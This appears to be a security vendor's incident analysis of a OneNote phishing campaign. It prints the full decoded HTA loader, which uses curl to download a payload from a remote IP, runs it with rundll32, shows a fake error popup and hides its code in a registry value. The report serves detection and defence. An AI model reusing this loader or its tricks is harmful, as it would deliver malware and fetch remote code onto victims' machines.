On February 3rd, 2023, Todyl’s MXDR team received alerts about a suspicious file being launched from OneNote. Upon execution, Todyl’s Endpoint Security (EDR + NGAV) module prevented the behavior and all subsequent stages of the attack.
Recognizing the severity, our MXDR and Detection Engineering teams began testing in our lab environment. Utilizing the Endpoint Security module in detect only mode, we received multiple alerts for malicious activity:
Detection Timeline:
Upon running the OneNote file, the user receives instructions to execute and embedded file (Open[.]hta) within the OneNote document:
Within the hta file, we found this encoded file:
Analyzing further, we were able to identify the hta files function mechanism:
<div
function sleep(millis){var date = new Date()
var curDate = null
do { curDate = new Date()
}while(curDate - date < millis)
}var shell = new ActiveXObject("wscript.shell")
/** var url = "https://google.com"
*/shell.run("curl.exe --output C:\\ProgramData\\a4aFOd5wh.png --url " + url, 0)
sleep(15000)
var shellap = new ActiveXObject("shell.application")
shellap.shellexecute("rundll32", "C:\\ProgramData\\a4aFOd5wh.png,Wind", "", "open", 3)
shell.Popup("This document is corrupted and could not be opened", 0, "Document Error", 16)
shell.run("taskkill /f /im mshta.exe", 0)
</div>
<script language="javascript">
var aPpcY2D6 = "5a29503a4909fcade36b1823e7cebcf5";
var akD8Sy = "HKCU\\SOFTWARE\\cqptlz\\ug9o\\b8kvyy";
function avlONjF(aD45uK)
{
return(document.getElementById(aD45uK).innerText);
}
</script>
<script language="vbscript">
Dim a9lAB
Set a9lAB = CreateObject("wscript.shell")
a9lAB.RegWrite akD8Sy, avlONjF("ap6oBZEfG"), "REG_SZ"
</script>
<script language="javascript">
var as4JIGMhX = a9lAB.regread(akD8Sy);
as4JIGMhX = as4JIGMhX.replace(/100&/g, "");
if(as4JIGMhX)
{
var avE9dmu = new Function("url", as4JIGMhX);
}
</script>
<script language="vbscript">
ay8b3d = "hxxp://172[.]96[.]137[].149/72943[.]dat"
Call avE9dmu(ay8b3d)
a9lAB.RegDelete(akD8Sy)
</script>
After running the .hta file, a curl command runs to grab 72943[.]dat from hxxp://172[.]96[.]137[.]149/72943[.]dat:
At the time of writing, VirusTotal reports this IP as clean. There have been reports of additional files with similar activity: